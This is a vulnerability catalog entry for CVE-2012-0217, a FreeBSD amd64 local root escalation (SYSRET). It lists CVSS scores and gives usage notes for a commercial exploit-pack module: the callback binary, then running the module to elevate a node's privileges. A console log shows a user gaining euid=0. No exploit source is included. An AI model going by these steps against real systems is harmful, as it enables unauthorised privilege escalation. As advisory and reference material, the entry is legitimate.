CVSS2: 7.2 High (AV:L/AC:L/Au:N/C:C/I:C/A:C)

Metric | Value |
---|---|
Access Vector | LOCAL |
Access Complexity | LOW |
Authentication | NONE |
Confidentiality Impact | COMPLETE |
Integrity Impact | COMPLETE |
Availability Impact | COMPLETE |

EPSS: 0.001 Low (Percentile: 21.9%)

Name | SYSRET |
---|---|
CVE | CVE-2012-0217 Exploit Pack |
VENDOR | Intel, FreeBSD |

Notes:

Tested on FreeBSD 9.0-RC3 and FreeBSD 9.0-RELEASE* AMD64.

To test this exploit from CANVAS, use the ./backdoors/mosdef_callbacks/mosdef_callback_fbsd9_i386 callback binary to establish a BSD node on a universal CANVAS listener. Then run the SYSRET module against this node to elevate your privileges on the node. This should work on FreeBSD 9.0-RELEASE* amd64 on 64-bit Intel processors. Note that this will not spawn a new node; it keeps the existing node connection, with elevated privileges.

Alternatively, you can use the Resources/x binary outside of the framework.

```
$ uname -a
FreeBSD freebsd90 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(immunity) gid=1001(immunity) groups=1001(immunity)
$ ./x
[] FeeBSD amd64 local r00t - sysret []
[DEBUG]: current target: 9.0-RELEASE
[DEBUG]: supported release: 9.0-RELEASE found
[DEBUG]: Triggering fault…
[DEBUG]: Resumed!!! -> geteuid()=0
uid=1001(immunity) gid=1001(immunity) euid=0(root) groups=1001(immunity)
```

Repeatability: Infinite
References: http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217